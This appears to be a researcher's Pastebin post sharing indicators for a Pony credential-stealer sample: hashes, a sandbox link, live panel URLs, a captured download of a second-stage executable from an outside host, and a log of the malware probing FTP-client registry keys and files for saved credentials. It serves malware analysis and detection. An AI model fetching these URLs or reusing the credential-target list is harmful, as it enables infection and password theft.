API tools faq
paste
Advertisement
Neonprimetime

2018-06-04 #pony panel sample

Neonprimetime
Jun 6th, 2018
597
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.82 KB | None | 0 0
raw download clone embed print report
  1. found by @neonprimetime security
  2. #pony panel #opendir
  3.  
  4. email subject: RE:NEW ORDER
  5.  
  6. zip
  7. 73a60a04f64a3ff34c89ff5810ca8c4d
  8. drops
  9. de3c7069e076dde4b18483e6ce741397
  10. https://www.hybrid-analysis.com/sample/71d8a607ba3fcc2d4a54216717f16ae35fcf3568315ba7cf3e7128540e6ceaae?environmentId=100
  11.  
  12. NM377737763763673763.exe
  13.  
  14. ----
  15. #opendir #pony panel
  16. ----
  17. http://satyainltd.com/panel/
  18. http://satyainltd.com/panel/admin.php
  19.  
  20. -------
  21. interesting file dropped
  22. -------
  23. C:\Users\Win732\AppData\Local\Temp\11601794.bat
  24.  
  25.  
  26. --------
  27. interesting network connections
  28. --------
  29. 10:09:25.3720901 AM NM377737763763673763.exe 4740 TCP Disconnect 192.168.113.252:51207 -> 45.122.138.22:80 SUCCESS Length: 0, seqnum: 0, connid: 0 0
  30. 25297 25.573368 192.168.113.252 45.122.138.22 HTTP 234 satyainltd.com GET /panel/shit.exe HTTP/1.0
  31. GET /panel/shit.exe HTTP/1.0
  32. Host: satyainltd.com
  33. Accept: */*
  34. Accept-Encoding: identity, *;q=0
  35. Connection: close
  36. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  37.  
  38.  
  39.  
  40. ---------
  41. interesting registries accessed
  42. ---------
  43. 10:09:17.8883875 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far\Plugins\FTP\Hosts NAME NOT FOUND Desired Access: Maximum Allowed 4628
  44. 10:09:17.8884019 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far2\Plugins\FTP\Hosts NAME NOT FOUND Desired Access: Maximum Allowed 4628
  45. 10:09:17.8884112 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far Manager\Plugins\FTP\Hosts NAME NOT FOUND Desired Access: Maximum Allowed 4628
  46. 10:09:17.8884204 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far\SavedDialogHistory\FTPHost NAME NOT FOUND Desired Access: Maximum Allowed 4628
  47. 10:09:17.8884273 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far2\SavedDialogHistory\FTPHost NAME NOT FOUND Desired Access: Maximum Allowed 4628
  48. 10:09:17.8884342 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far Manager\SavedDialogHistory\FTPHost NAME NOT FOUND Desired Access: Maximum Allowed 4628
  49. 10:09:17.8884548 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
  50. 10:09:17.8884633 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
  51. 10:09:17.8884687 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
  52. 10:09:17.8884745 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
  53. 10:09:17.8885038 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
  54. 10:09:17.8885866 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
  55. 10:09:17.8886019 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
  56. 10:09:17.8886076 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
  57. 10:09:17.8886129 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
  58. 10:09:17.8886182 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
  59. 10:09:17.8886366 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
  60. 10:09:17.8886501 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
  61.  
  62. ------
  63. interesting files accessed
  64. -------
  65.  
  66. 10:09:17.8887963 AM NM377737763763673763.exe 4740 CreateFile C:\Windows\wcx_ftp.ini NAME NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  67. 10:09:17.8951000 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  68. 10:09:17.8951525 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  69. 10:09:17.8952049 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  70. 10:09:17.8952454 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  71. 10:09:17.8952936 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  72. 10:09:17.8953331 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  73. 10:09:17.8953765 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  74. 10:09:17.8954734 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\CuteFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  75. 10:09:17.8955390 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  76. 10:09:17.8959301 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  77. 10:09:17.8959972 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  78. 10:09:17.8960404 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Pro\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  79. 10:09:17.8960852 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  80. 10:09:17.8961243 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Lite\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  81. 10:09:17.8961682 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  82. 10:09:17.8963149 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\CuteFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  83. 10:09:17.8963917 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  84. 10:09:17.8964379 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  85. 10:09:17.8964890 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  86. 10:09:17.8965302 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Pro\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  87. 10:09:17.8965795 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  88. 10:09:17.8966320 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Lite\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  89. 10:09:17.8966805 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
  90. 10:09:17.8967718 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\CuteFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  91. 10:09:17.9035099 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  92. 10:09:17.9036191 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  93. 10:09:17.9037277 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  94. 10:09:17.9038189 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  95. 10:09:17.9039295 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  96. 10:09:17.9040612 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  97. 10:09:17.9041753 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  98. 10:09:17.9042635 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  99. 10:09:17.9043472 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  100. 10:09:17.9044444 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  101. 10:09:17.9045721 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  102. 10:09:17.9046697 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  103. 10:09:17.9048943 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  104. 10:09:17.9050075 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
  105. 10:09:17.9051005 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!